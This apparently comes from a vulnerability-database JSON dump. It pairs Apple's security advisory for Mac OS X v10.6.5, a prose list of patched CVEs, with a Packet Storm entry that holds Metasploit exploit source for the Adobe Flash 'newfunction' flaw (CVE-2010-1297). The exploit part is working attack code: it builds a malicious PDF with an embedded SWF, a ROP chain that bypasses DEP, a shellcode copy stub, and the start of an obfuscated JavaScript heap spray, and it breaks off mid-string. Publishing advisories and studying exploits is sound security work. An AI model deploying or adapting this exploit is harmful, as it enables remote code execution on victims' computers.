Opening a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of UDIF disk images. Credit to Marc Schoenefeld of Red Hat for reporting this issue.\r\n\r\n *\r\n\r\n Flash Player plug-in\r\n\r\n CVE-ID: CVE-2008-4546, CVE-2009-3793, CVE-2010-0209, CVE-2010-1297, CVE-2010-2160, CVE-2010-2161, CVE-2010-2162, CVE-2010-2163, CVE-2010-2164, CVE-2010-2165, CVE-2010-2166, CVE-2010-2167, CVE-2010-2169, CVE-2010-2170, CVE-2010-2171, CVE-2010-2172, CVE-2010-2173, CVE-2010-2174, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2179, CVE-2010-2180, CVE-2010-2181, CVE-2010-2182, CVE-2010-2183, CVE-2010-2184, CVE-2010-2185, CVE-2010-2186, CVE-2010-2187, CVE-2010-2189, CVE-2010-2188, CVE-2010-2213, CVE-2010-2214, CVE-2010-2215, CVE-2010-2216, CVE-2010-2884, CVE-2010-3636, CVE-2010-3638, CVE-2010-3639, CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652, CVE-2010-3654, CVE-2010-3976\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in Adobe Flash Player plug-in\r\n\r\n Description: Multiple issues exist in the Adobe Flash Player plug-in, the most serious of which may lead to arbitrary code execution. The issues are addressed by updating the Flash Player plug-in to version 10.1.102.64. 
Further information is available via the Adobe web site at http://www.adobe.com/support/security/\r\n\r\n *\r\n\r\n gzip\r\n\r\n CVE-ID: CVE-2010-0001\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer overflow exists in gzip's handling of archives that use LZW compression. Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit to Aki Helin of the Oulu University Secure Programming Group for reporting this issue.\r\n\r\n *\r\n\r\n gzip\r\n\r\n CVE-ID: CVE-2009-2624\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in gzip. Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n Image Capture\r\n\r\n CVE-ID: CVE-2010-1844\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted image may lead to an unexpected system shutdown\r\n\r\n Description: An unbounded memory consumption issue exists in Image Capture. Downloading a maliciously crafted image may lead to an unexpected system shutdown. This issue is addressed through improved input validation. This issue does not affect systems prior to Mac OS X v10.6. Credit to Steven Fisher of Discovery Software Ltd. 
for reporting this issue.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-1845\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted PSD image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in ImageIO's handling of PSD images. Viewing a maliciously crafted PSD image may lead to an unexpected application termination or arbitrary code execution. These issues are addressed through improved validation of PSD images. Credit to Dominic Chell of NGSSoftware for reporting one of these issues.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-1811\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in the handling of TIFF Images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-2249, CVE-2010-1205\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in libpng\r\n\r\n Description: libpng is updated to version 1.4.3 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. 
Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html\r\n\r\n *\r\n\r\n Image RAW\r\n\r\n CVE-ID: CVE-2010-1846\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted RAW image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in Image RAW's handling of images. Viewing a maliciously crafted RAW image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n Kernel\r\n\r\n CVE-ID: CVE-2010-1847\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local user may cause an unexpected system shutdown\r\n\r\n Description: A memory management issue in the handling of terminal devices may allow a local user to cause an unexpected system shutdown. This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n MySQL\r\n\r\n CVE-ID: CVE-2010-1848, CVE-2010-1849, CVE-2010-1850\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in MySQL 5.0.88\r\n\r\n Description: MySQL is updated to version 5.0.91 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. MySQL is only provided with Mac OS X Server systems. 
Further information is available via the MySQL web site at http://dev.mysql.com/doc/refman/5.0/en/news-5-0-91.html\r\n\r\n *\r\n\r\n neon\r\n\r\n CVE-ID: CVE-2009-2473, CVE-2009-2474\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in neon 0.28.3\r\n\r\n Description: neon is updated to version 0.28.6 to address several vulnerabilities, the most serious of which may allow a man-in-the-middle attacker to redirect connections and intercept user credentials or other sensitive information. Further information is available via the neon web site at http://www.webdav.org/neon/\r\n\r\n *\r\n\r\n Networking\r\n\r\n CVE-ID: CVE-2010-1843\r\n\r\n Available for: Mac OS X v10.6.2 through v10.6.4, Mac OS X Server v10.6.2 through v10.6.4\r\n\r\n Impact: A remote attacker may cause an unexpected system shutdown\r\n\r\n Description: A null pointer dereference issue exists in the handling of Protocol Independent Multicast (PIM) packets. By sending a maliciously crafted PIM packet, a remote attacker may cause an unexpected system shutdown. This issue is addressed through improved validation of PIM packets. This issue does not affect systems prior to Mac OS X v10.6.2. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n OpenLDAP\r\n\r\n CVE-ID: CVE-2010-0211\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause a denial of service or arbitrary code execution\r\n\r\n Description: A memory management issue exists in OpenLDAP. By sending a maliciously crafted query an attacker may cause a denial of service or arbitrary code execution. 
This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n OpenLDAP\r\n\r\n CVE-ID: CVE-2010-0212\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause a denial of service\r\n\r\n Description: A null pointer dereference exists in OpenLDAP. By sending a maliciously crafted query an attacker may cause a denial of service. This issue is addressed through improved memory management. Credit to Ilkka Mattila and Tuomas Salomaki for reporting this issue.\r\n\r\n *\r\n\r\n OpenSSL\r\n\r\n CVE-ID: CVE-2010-1378\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote user may bypass TLS authentication or spoof a trusted server\r\n\r\n Description: An arithmetic issue exists in OpenSSL's certificate validation. A remote user may bypass certificate validation steps, and cause OpenSSL to accept any certificate signed by a trusted root as valid. This issue is addressed through improved certificate validation. This issue does not affect systems prior to Mac OS X v10.6. This issue only affects the Mac OS X distribution of OpenSSL. Credit to Ryan Govostes of RPISEC for reporting this issue.\r\n\r\n *\r\n\r\n Password Server\r\n\r\n CVE-ID: CVE-2010-3783\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may be able to log in with an outdated password\r\n\r\n Description: An implementation issue in Password Server's handling of replication may cause passwords to not be replicated. A remote attacker may be able to log in to a system using an outdated password. This issue is addressed through improved handling of password replication. This issue only affects Mac OS X Server systems. 
Credit: Apple.\r\n\r\n *\r\n\r\n PHP\r\n\r\n CVE-ID: CVE-2010-0397, CVE-2010-2531\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in PHP 5.3.2\r\n\r\n Description: PHP is updated to version 5.3.3 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/\r\n\r\n *\r\n\r\n PHP\r\n\r\n CVE-ID: CVE-2010-0397, CVE-2010-2531, CVE-2010-2484\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\r\n\r\n Impact: Multiple vulnerabilities in PHP 5.2.12\r\n\r\n Description: PHP is updated to version 5.2.14 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/\r\n\r\n *\r\n\r\n Printing\r\n\r\n CVE-ID: CVE-2010-3784\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Applications that use the PMPageFormatCreateWithDataRepresentation API may be vulnerable to an unexpected application termination\r\n\r\n Description: A null dereference issue exists in the PMPageFormatCreateWithDataRepresentation API's handling of XML data. Applications that use this API may be vulnerable to an unexpected application termination. This issue is addressed through improved handling of XML data. 
Credit to Wujun Li of Microsoft for reporting this issue.\r\n\r\n *\r\n\r\n python\r\n\r\n CVE-ID: CVE-2009-4134, CVE-2010-1449, CVE-2010-1450\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Python applications using the rgbimg and audioop modules may be vulnerable to an unexpected application termination or arbitrary code execution.\r\n\r\n Description: Multiple integer overflows exist in python's rgbimg and audioop modules. Python applications using the rgbimg and audioop modules may be vulnerable to an unexpected application termination or arbitrary code execution. These issues are addressed through improved bounds checking.\r\n\r\n *\r\n\r\n QuickLook\r\n\r\n CVE-ID: CVE-2010-3785\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in QuickLook's handling of Microsoft Office files. Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n QuickLook\r\n\r\n CVE-ID: CVE-2010-3786\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted Excel file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickLook's handling of Excel files. Downloading a maliciously crafted Excel file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. 
This issue does not affect systems prior to Mac OS X v10.6. Credit to Tobias Klein, working with VeriSign iDefense Labs for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3787\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in QuickTime's handling of JP2 images. Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Nils of MWR InfoSecurity for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3788\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in QuickTime's handling of JP2 images. Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of JP2 images. Credit to Damian Put and Procyun, working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3789\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted avi file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickTime's handling of avi files. Viewing a maliciously crafted avi file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of avi files. 
Credit to Damian Put working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3790\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickTime's handling of movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of movie files. Credit to Honggang Ren of Fortinet's FortiGuard Labs for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3791\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in QuickTime's handling of MPEG encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3792\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A signedness issue exists in QuickTime's handling of MPEG encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of MPEG encoded movie files. 
Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3793\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in the handling of Sorenson encoded movie files. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of Sorenson encoded movie files. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative and Carsten Eiram of Secunia Research for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3794\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted FlashPix image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in QuickTime's handling of FlashPix images. Viewing a maliciously crafted FlashPix image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3795\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted GIF image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in QuickTime's handling of GIF images. 
Viewing a maliciously crafted GIF image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n Safari RSS\r\n\r\n CVE-ID: CVE-2010-3796\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Accessing a maliciously crafted "feed:" URL may lead to the disclosure of sensitive information\r\n\r\n Description: Java applets are allowed in RSS feeds. Since Java applets can modify the loading DOM, accessing a maliciously crafted "feed:" URL may lead to the disclosure of sensitive information. This issue is addressed by disallowing Java applets in RSS feeds. Credit to Jason Hullinger of IOActive for reporting this issue.\r\n\r\n *\r\n\r\n Time Machine\r\n\r\n CVE-ID: CVE-2010-1803\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may access a user's Time Machine information\r\n\r\n Description: The user may designate a remote AFP volume to be used for Time Machine backups. Time Machine does not verify that the same physical device is being used for subsequent backup operations. An attacker who is able to spoof the remote AFP volume can gain access to the user's backup information. This issue is addressed by verifying the unique identifier associated with a disk for backup operations. This issue does not affect Mac OS X v10.5 systems. Credit to Renaud Deraison of Tenable Network Security, Inc. 
for reporting this issue.\r\n\r\n *\r\n\r\n Wiki Server\r\n\r\n CVE-ID: CVE-2010-3797\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A user who can edit wiki pages may obtain the credentials of other users\r\n\r\n Description: A JavaScript injection issue exists in Wiki Server. A user who can edit wiki pages may obtain the credentials of any user who visits the edited pages. This issue is addressed through improved input validation. This issue only affects Mac OS X Server systems. Credit: Apple.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2010-1205, CVE-2010-2249, CVE-2010-0205\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in libpng version 1.2.41\r\n\r\n Description: Multiple vulnerabilities exist in libpng version 1.2.42, the most serious of which may lead to arbitrary code execution. These issues are addressed by updating to version 1.2.44. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2009-0946, CVE-2010-2497, CVE-2010-2498, CVE-2010-2499, CVE-2010-2500, CVE-2010-2519, CVE-2010-2520, CVE-2010-2805, CVE-2010-2806, CVE-2010-2807, CVE-2010-2808, CVE-2010-3053, CVE-2010-3054\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in FreeType 2.3.9\r\n\r\n Description: Multiple vulnerabilities exist in FreeType 2.3.9, the most serious of which may lead to arbitrary code execution when processing a maliciously crafted font. These issues are addressed by updating FreeType to version 2.4.2. 
Further information is available via the FreeType site at http://www.freetype.org/\r\n\r\n *\r\n\r\n xar\r\n\r\n CVE-ID: CVE-2010-3798\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted xar archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in xar. Extracting a maliciously crafted xar archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit: Apple.\r\n\r\n", "edition": 1, "modified": "2010-11-18T00:00:00", "published": "2010-11-18T00:00:00", "id": "SECURITYVULNS:DOC:25153", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25153", "title": "About the security content of Mac OS X v10.6.5 and Security Update 2010-007", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:29", "description": "", "published": "2010-06-15T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player newfunction Invalid Pointer Use", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-06-15T00:00:00", "id": "PACKETSTORM:90665", "href": "https://packetstormsecurity.com/files/90665/Adobe-Flash-Player-newfunction-Invalid-Pointer-Use.html", "sourceData": "`## \n# $Id: adobe_flashplayer_newfunction.rb 9477 2010-06-10 20:55:17Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \nrequire 'zlib' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player \"newfunction\" Invalid Pointer Use', \n'Description' => %q{ \nThis module exploits a vulnerability in the DoABC tag handling within \nversions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also \nvulnerable, as are any other applications that may embed Flash player. \n \nArbitrary code execution is achieved by embedding a specially crafted Flash \nmovie into a PDF document. An AcroJS heap spray is used in order to ensure \nthat the memory used by the invalid pointer issue is controlled. \n \nNOTE: This module uses a similar DEP bypass method to that used within the \nadobe_libtiff module. This method is unlikely to work across various \nWindows versions due to the hardcoded syscall number. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Found being openly exploited \n'jduck' # Metasploit version \n], \n'Version' => '$Revision: 9477 $', \n'References' => \n[ \n['CVE', '2010-1297'], \n['OSVDB', '65141'], \n['BID', '40586'], \n['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'], \n# For SWF->PDF embedding \n['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'HTTP::compression' => 'gzip', \n'HTTP::chunked' => true, \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\", \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd \n# Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd \n# Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd \n[ 'Automatic', { }], \n], \n'DisclosureDate' => 'Jun 04 2010', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n# load the static swf file \npath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2010-1297.swf\" ) \nfd = File.open( path, \"rb\" ) \n@swf_data = fd.read(fd.stat.size) \nfd.close \n \nsuper \nend \n \ndef on_request_uri(cli, request) \n \nprint_status(\"Sending crafted PDF w/SWF to #{cli.peerhost}:#{cli.peerport}\") \n \njs_data = make_js(regenerate_payload(cli).encoded) \npdf_data = make_pdf(@swf_data, js_data) \nsend_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' }) \n \n# Handle the payload \nhandler(cli) \nend \n \n \ndef make_js(encoded_payload) \n \n# The following executes a ret2lib using BIB.dll \n# The effect is to bypass DEP and execute the shellcode in an indirect way \nstack_data = [ \n0xc0c0c0c, \n0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret \n0xcccccccc, \n0x70048ef, # xchg 
eax,esp / ret \n0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8] \n0xcccccccc, \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009033, # ret 0x18 \n0x7009084, # ret \n0xc0c0c0c, \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7001599, # pop ebp / ret \n0x10124, \n0x70072f7, # pop eax / ret \n0x10104, \n0x70015bb, # pop ecx / ret \n0x1000, \n0x700154d, # mov [eax], ecx / ret \n0x70015bb, # pop ecx / ret \n0x7ffe0300, # -- location of KiFastSystemCall \n0x7007fb2, # mov eax, [ecx] / ret \n0x70015bb, # pop ecx / ret \n0x10011, \n0x700a8ac, # mov [ecx], eax / xor eax,eax / ret \n0x70015bb, # pop ecx / ret \n0x10100, \n0x700a8ac, # mov [ecx], eax / xor eax,eax / ret \n0x70072f7, # pop eax / ret \n0x10011, \n0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?) \n0x7005c54, # pop esi / add esp,0x14 / ret \n0xffffffff, \n0x10100, \n0x0, \n0x10104, \n0x1000, \n0x40, \n# The next bit effectively copies data from the interleaved stack to the memory \n# pointed to by eax \n# The data copied is: \n# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83 \n# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff \n# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90 \n0x700d731, # mov eax, [ebp-0x24] / ret \n0x70015bb, # pop ecx / ret \n0x9054905a, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x5815eb5a, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x18891a8b, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x8304c083, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xfb8104c2, 
\n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xc0c0c0c, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x5ebee75, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xffffe6e8, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x909090ff, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90909090, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90909090, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90ffffff, \n0x700154d, # mov [eax], ecx / ret \n0x700d731, # mov eax, [ebp-0x24] / ret \n0x700112f # call eax -- (execute stub to transition to full shellcode) \n].pack('V*') \n \nvar_unescape = rand_text_alpha(rand(100) + 1) \nvar_shellcode = rand_text_alpha(rand(100) + 1) \n \nvar_start = rand_text_alpha(rand(100) + 1) \n \nvar_s = 0x10000 \nvar_c = rand_text_alpha(rand(100) + 1) \nvar_b = rand_text_alpha(rand(100) + 1) \nvar_d = rand_text_alpha(rand(100) + 1) \nvar_3 = rand_text_alpha(rand(100) + 1) \nvar_i = rand_text_alpha(rand(100) + 1) \nvar_4 = rand_text_alpha(rand(100) + 1) \n \npayload_buf = '' \npayload_buf << stack_data \npayload_buf << encoded_payload \n \nescaped_payload = Rex::Text.to_unescape(payload_buf) \n \njs = %Q| \nvar #{var_unescape} = unescape; \nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' ); \nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" ); 